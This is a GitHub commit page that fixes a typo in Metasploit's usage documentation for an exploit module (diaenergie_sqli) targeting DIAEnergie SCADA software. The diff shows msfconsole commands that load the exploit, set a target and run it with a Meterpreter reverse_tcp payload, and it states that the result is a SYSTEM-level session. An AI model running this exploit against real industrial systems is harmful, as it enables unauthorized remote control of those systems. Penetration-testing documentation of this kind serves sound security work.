Skip to content

Commit 2d9aed7

Browse files
committed
fixed typo
1 parent 341142d commit 2d9aed7

File tree

1 file changed

+3
-3
lines changed

1 file changed

+3
-3
lines changed

documentation/modules/exploit/windows/scada/diaenergie_sqli.md

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -32,8 +32,8 @@ For the product to work correctly, SQL Server (e.g., SQL Server Express) needs t
3232
```
3333
msf6 > use exploit/windows/scada/diaenergie_sqli
3434
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
35-
msf6 exploit(windows/scada/mypro_cmdexe) > set RHOSTS <IP>
36-
msf6 exploit(windows/scada/mypro_cmdexe) > exploit
35+
msf6 exploit(windows/scada/diaenergie_sqli) > set RHOSTS <IP>
36+
msf6 exploit(windows/scada/diaenergie_sqli) > exploit
3737
```
3838

3939
You should get a meterpreter session in the context of `NT AUTHORITY\SYSTEM`.
@@ -44,7 +44,7 @@ Running the exploit against DIAEnergie v1.10 on Windows 10 22H2, using curl as a
4444
following:
4545

4646
```
47-
msf6 exploit(windows/scada/mypro_cmdexe) > exploit
47+
msf6 exploit(windows/scada/diaenergie_sqli) > exploit
4848
4949
[*] Started reverse TCP handler on 192.168.1.241:4444
5050
[*] 192.168.1.245:928 - Running automatic check ("set AutoCheck false" to disable)

0 commit comments

Comments
 (0)